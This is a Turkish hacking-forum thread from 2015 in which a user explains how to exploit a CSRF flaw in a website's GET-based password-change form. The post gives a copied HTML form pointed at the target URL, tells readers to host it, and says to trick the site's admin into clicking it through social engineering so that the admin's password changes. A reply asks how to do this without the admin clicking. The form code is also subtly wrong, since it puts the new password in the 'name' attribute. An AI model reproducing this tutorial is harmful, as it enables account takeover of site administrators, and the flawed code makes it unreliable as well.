Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: CSRF/XSRF açığı bulma
fargo
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 4
Yaşam Puanı: 2 / 94
Deneyim: 76 / 100
Rep Sayısı: 1
Mesaj Sayısı: 36
Üyelik Tarihi: 07.04.2015
     
Yorum: #1
CSRF/XSRF açığı bulma
16.05.2015 13:46
Alıntı:CSRF/XSRF açığı bulma ?

– Bir web site düşünün web sitenin üyelik sistemi var bura bir forum sitesi olabilir ve şifre değiştirme bölümü şöyle http://www.hedef.com/sifredegistir.php olsun siz üyeliğinizden şifreyi değiştirdiğiniz anda eğer şöyle olursa ;

http://www.hedef.com/sifredegistir.php?sifre=CWHack



burada CSRF/XSRF açığı vardır. Bizim yapmamız gereken şey sayfanın kaynak kodunu görüntelemek olacak, bu http://www.hedef.com/sifredegistir.php?sifre=CWHack sayfanın kaynak kodunu görünteleyelim.
<form></form> taglarını arayalım.

<form method=”GET” action=”sifredegistir.php”>
<input type=”text” name=”sifreniz”>
<input type=”Submit” Name=”Submit” Value=”Gönder”>
</form>

-Şimdi birkaç değişiklik yapacağız buradaki action=”sifredegistir.php” sifredegistir.php kısmına sitenin tam şifre değiştirme adresini yazıyoruz. Yani; http://www.hedef.com/sifredegistir.php yazıyoruz.
name=”sifreniz” buradaki sifreniz kısmına ise istediğiniz bir şifreyi yazıyoruz. Mesela abcd yazalım. Yani şöyle olacak ;

<form method=”GET” action=”www.hedef.com/sifredegistir.php”>
<input type=”text” name=”abcd”>
<input type=”Submit” Name=”Submit” Value=”Gönder”>
</form>

– Şimdi kodları html olarak kaydedelim. Sonra hostunuza atın. Kurbana yani admine Sosyal Mühendislik yoluyla atalım. Eğer linke tıklarsa şifresi abcd olarak değişecek. CSRF/XSRF açığı bu kadar. Kolay gelsin / Fargo


Alinti
hosume
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 7
Yaşam Puanı: 8 / 167
Deneyim: 71 / 100
Rep Sayısı: 1
Mesaj Sayısı: 77
Üyelik Tarihi: 11.02.2015
     
Yorum: #2
Cvp: CSRF/XSRF açığı bulma
17.05.2015 22:32
Admine link yedirmeden csrf acigindan nasil post kasa biliriz forumda aynen ayar abimizin yapdigi gibi)))
Alinti



1 Ziyaretçi